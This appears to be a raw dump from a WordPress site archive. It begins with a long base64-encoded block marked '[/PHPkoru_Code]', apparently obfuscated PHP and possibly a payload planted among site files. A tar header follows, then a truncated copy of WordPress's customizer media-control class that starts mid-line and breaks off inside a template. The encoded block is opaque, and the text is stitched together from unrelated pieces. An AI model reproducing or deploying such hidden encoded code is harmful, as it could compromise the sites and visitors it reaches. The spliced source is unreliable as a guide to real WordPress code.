hjL0xTeWc2WDlNZG5uVTVMUzlEcEt4cXBzR2ozTDR0bmV5TzZvS3ZhL3FLUGllcjFzVy9zYTRVTjdSdElXWlFVZCtuelU2dkNOYmZsTTR6cFkwU2c1RmNvR3FTa3hIWm1vSzk4alBFcTR4TDZ2b2VBaU1Oc2ppM1hpTzF2TnV4ZHdVa0F4V0dicGw0ODJ6ZHR6akhJY1NWc2hBQ1pEVzZleDdhNll0MEdFM0d2eHd3ekROVmU4WlNGSjBycTJscnI3WTA4YWJaSC91MTloajc0VlgvSm8wMFdmYm81dUpMcW5wUVdidFp1QXExN2EzamRlQkRoQi9TWVhXck1YeVEra3FqcHlPV21FVGVXc2hSb2UvNjIwT1hzNzFZNmF2VUM1Q3E2S2NWSlpNUlV2L3ZsRFZOTEtZUFJ4R1pTQnNxZHRkUUM3TGp1dVdrc3FUSXN6VUF4OUVibEpQNjJGYVgvZVpKYjRrZk93SzQrZlU1S1Nob1g4N0hHY08wMS9Xdm91Qm14WC9XcEdydXNzcnozY3MzbTNrcW5tZHg4WGtjT2JkV0VrUm55WDRsLzgwM0w1T0N6aEJRTFNxbHZZM0UzeWpKL044WGg2aEsybEcwQWJxU1RLZEZlNEp6MzJXL01idE5WNW9ZREtIcysweEwraVVJd0Z2VHVwUXpSU1luM0s2MGptQ1Zub0w2c2JSa0ZDSm9hNzFMRkNxN2lOdzEyUjJXQURxSjVxVGo5WTVDMUJEcWYzMEgyY0p6SEt2b3ZKNVFIOEZSdFE1ektVYXplUjF3M3NBTkt0b2ZZS1ppME82M0xla1RGS242NXVoK0Jwd3hRRzRNYVhsanMxeVdnWTFRaTlFMG9SZUY1MmFBVDdqM0NQOVZtN1hwaVBZbFlPSVR6YXdYZWtxYXc3bkQ2VGRQOTFCU1VuNGdhc2U5ME1GTXYxOXhHK0o3eVVzU2tKT1MveFU2WFN1MEZ5S09uY04zaE52N0pQNHFiUkRucWJaZXpzNDluOVRYTGFpZ2QrRndVZjVZUlRzMFJnNmRoQm01cThuanBlZ0o0N3U0ZHdmcFUxSitoMkwxMzVHKzg0WHVMcTRQcHEraUxiS2NPK3gwdnRDKzM5SlJJWEJRNnJGWFYzRi9YeHVUQUQzaXYrTlhPdUs1VmhTdlBsb3lJakxFZ1ZqbHZwdWZhdmI5VW10S0hGS2N4RXZjSTRrVFNGMmxPWE0wak9mZkE3WnlYa0xtU2xCYjl3a0dnTzgxNlFOVytXUWY5cjgyaXlxT0ZzSmVsaDRtbkJsMS9IT0RsOXJMZnNEb0pIZGJkeWdvV3lZdjloaGkxTitSRHM1RWJoL21zWWFXQzZwbm9ONVhUNU52U3o5THBwRFJuMXdqLzJFTnFUMnltMmQ3Q21BNFZIbTE1Tk04c1NmZFpkSkkzUlpoSDRFSE52Um5waUZUTmFWclhTR2NvUDZxTGM4SFNKY2FPNzFucjNDcm9DMU1vRFhZcURxbnpwUm9nTldiZDhPWm1EOEE1QWEwWmRKOUMwTFpMMVNTbWtMbXlhWTdZRGdVNzFWWjZ1ZDlJaGFvUlRuYTBOUE1lczFTY0NCZ093N3U5QkM3MDRuMGhIQ0VHSCtZTmpLMEVPOWNZVVRURHJmRmZ1YnlWeFRVbE9QUFg3NlBRdFRDUHU2TUdWU0VhNEx5OForQjR5VGV3Nm1Kck90UmNxZWx4dmJGdjBUYkhHaWpxQjRoZ1JnMERWWVY0V3YzTkRHQzNhM3NZK1dDNWJMWUxRekE0U2p6RHRaOExJcklPcDcvUmM1V09zUmtUYTVxZUFJVUY0WTBySlF0MWlVSG84aWIxWnB2MjdDUXMxeW5xTTUxakhoQjlLLzczZEIrUTJNclYxand1cURFTHZZRWwzOC9td1lTSFdyV040clVyZ1dPMzVwZm52UlVMWTQ1TlNqVndMclFCVXA4L3ljcW9UMUkxdnFCemdzK0U2S2tPTG9sMjJrSXVmTWdpa0ljT1FLUDFxMEFFclVxNXRSSzdFTFpaaVB0d3crTmlMQ3h0UTJZaHczWVBqSFJIaEp0UXlkczZqaDVqdE1UeTlKRjYvcDIzQWprdU14RkFabkI5czZkcGxrdGNveVgxOHV1TExrcWpHU2ZBb3NqOVBvSlg4UlFYZDVhMzFUZTNYWnJ2ZStGWmFvb2Z3YmNPeFB5RWdOcEhQakJQT0RlaklMOHBoY0FUTk5CRkJaZnlNR2t1aC8rMHp6MkV3UUNxRzZBV2NUdVlHSWJUNXd3cldGbW8zbFRYUktNSEtZODB1b1V6T1A3UCtQZHNTMTFnV1k4SjNoMTUxNGJjSTZqbGxnMWNibjkwQmJUZm1FcFVETnhWTlpQN2FrYTJQZ01ITHAyZEwyUEo4WFJabWdrdFd4ZGdjeEtUV3RGTEdDZCtCU2MyWCtUbjNpdXRzVVZNelZYVVFtL0RQVnJLMHp2RHIwZDJCbnl1MHRKTUpNdkZHWmUzdmxWT0Z3RmYvZDhjMW1VNXBKayszbkVrTVJrZG90eGNaTzd4Z0pyWTFmb3I2ZnMxeVJHT0dkdEMvaVdwazM2SmFyKy9YcHFyTm5xb2xXc0ZpbEZEWVpxbURjM2RoazZKK09hR0FXUGpvQnEwNnJhYUZRc203YlBLV3FNZmlGVThZajdKZVhRS3IxUXkyUTg4M2dxeUVhZllxdzJ2U2pCZk1qL1NyS2dlM3dJNEJ3Ymlqa3JwMFpPdFJQczZ2cE1KeE4xNE5GUnBaSDgzM210aXFNRkI3ZWl6NEE0T1JCRVZqUENMdTZlZTZ6b0N0aFVqUmk1MlF4MVJjb01EZ0RiT2d2NUxTcWhuWW1EMHRQWHgrY1FVRHFibFRpUHQ1QWhyamw0YXJCcUFyMFZVSzZsN05VMEZJdkNiQWRvR3JqajZCZjlKL3FzTFpjVzFPc1VwelRBL051SHRzZys0ODJhMUd4cDlHaHZEZDE2K0s=
[/PHPkoru_Code] class-wp-customize-media-control.php 0000644 00000022275 15222250760 0013572 0 ustar 00 button_labels = wp_parse_args( $this->button_labels, $this->get_default_button_labels() );
}
/**
* Enqueue control related scripts/styles.
*
* @since 3.4.0
* @since 4.2.0 Moved from WP_Customize_Upload_Control.
*/
public function enqueue() {
wp_enqueue_media();
}
/**
* Refresh the parameters passed to the JavaScript via JSON.
*
* @since 3.4.0
* @since 4.2.0 Moved from WP_Customize_Upload_Control.
*
* @see WP_Customize_Control::to_json()
*/
public function to_json() {
parent::to_json();
$this->json['label'] = html_entity_decode( $this->label, ENT_QUOTES, get_bloginfo( 'charset' ) );
$this->json['mime_type'] = $this->mime_type;
$this->json['button_labels'] = $this->button_labels;
$this->json['canUpload'] = current_user_can( 'upload_files' );
$value = $this->value();
if ( is_object( $this->setting ) ) {
if ( $this->setting->default ) {
/*
* Fake an attachment model - needs all fields used by template.
* Note that the default value must be a URL, NOT an attachment ID.
*/
$ext = substr( $this->setting->default, -3 );
$type = in_array( $ext, array( 'jpg', 'png', 'gif', 'bmp', 'webp', 'avif' ), true ) ? 'image' : 'document';
$default_attachment = array(
'id' => 1,
'url' => $this->setting->default,
'type' => $type,
'icon' => wp_mime_type_icon( $type, '.svg' ),
'title' => wp_basename( $this->setting->default ),
);
if ( 'image' === $type ) {
$default_attachment['sizes'] = array(
'full' => array( 'url' => $this->setting->default ),
);
}
$this->json['defaultAttachment'] = $default_attachment;
}
if ( $value && $this->setting->default && $value === $this->setting->default ) {
// Set the default as the attachment.
$this->json['attachment'] = $this->json['defaultAttachment'];
} elseif ( $value ) {
$this->json['attachment'] = wp_prepare_attachment_for_js( $value );
}
}
}
/**
* Don't render any content for this control from PHP.
*
* @since 3.4.0
* @since 4.2.0 Moved from WP_Customize_Upload_Control.
*
* @see WP_Customize_Media_Control::content_template()
*/
public function render_content() {}
/**
* Render a JS template for the content of the media control.
*
* @since 4.1.0
* @since 4.2.0 Moved from WP_Customize_Upload_Control.
*/
public function content_template() {
?>
<#
var descriptionId = _.uniqueId( 'customize-media-control-description-' );
var describedByAttr = data.description ? ' aria-describedby="' + descriptionId + '" ' : '';
#>
<# if ( data.label ) { #>
{{ data.label }}
<# } #>
<# if ( data.description ) { #>
{{{ data.description }}}
<# } #>
<# if ( data.attachment && data.attachment.id ) { #>